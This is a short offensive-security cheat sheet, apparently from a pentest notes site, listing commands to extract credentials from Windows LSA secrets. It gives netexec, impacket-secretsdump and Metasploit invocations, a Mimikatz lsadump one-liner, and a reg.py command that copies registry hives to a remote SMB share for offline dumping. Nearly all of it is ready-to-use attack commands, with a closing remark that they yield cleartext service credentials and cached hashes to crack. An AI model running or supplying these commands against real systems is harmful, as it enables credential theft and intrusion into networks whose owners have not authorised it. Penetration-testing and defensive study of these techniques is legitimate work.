search
githubEdit

Extract Credentials from LSA

hashtag
Tools: CrackMpaExec/Netexec , impacket-secretsdump , reg.py

hashtag
1) CrackMapExec/Netexec

netexec smb IP_RANGE -u USER -p 'PASSWORD' --lsa

hashtag
2) Impacket-secretsdump

impacket-secretsdump DOMAIN/USER:PASSWORD@IP

hashtag
3) reg.py

reg.py DOMAIN/USER:PASSWORD@IP backup -o '\\SMB_IP\share'

impacket-secretsdump -security SECURITY_FILE -system SYSTEM_FILE LOCAL

hashtag
4) Metasploit

use post/windows/gather/lsa_secrets

hashtag
5) Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'

hashtag
With dumping LSA, we dump cleartext credentals for service and machine accounts as well as Cache domain logon (MsCache 2) hashes to crack

PreviousExtract DPAPI and Credentials VaultNextLSASS

Last updated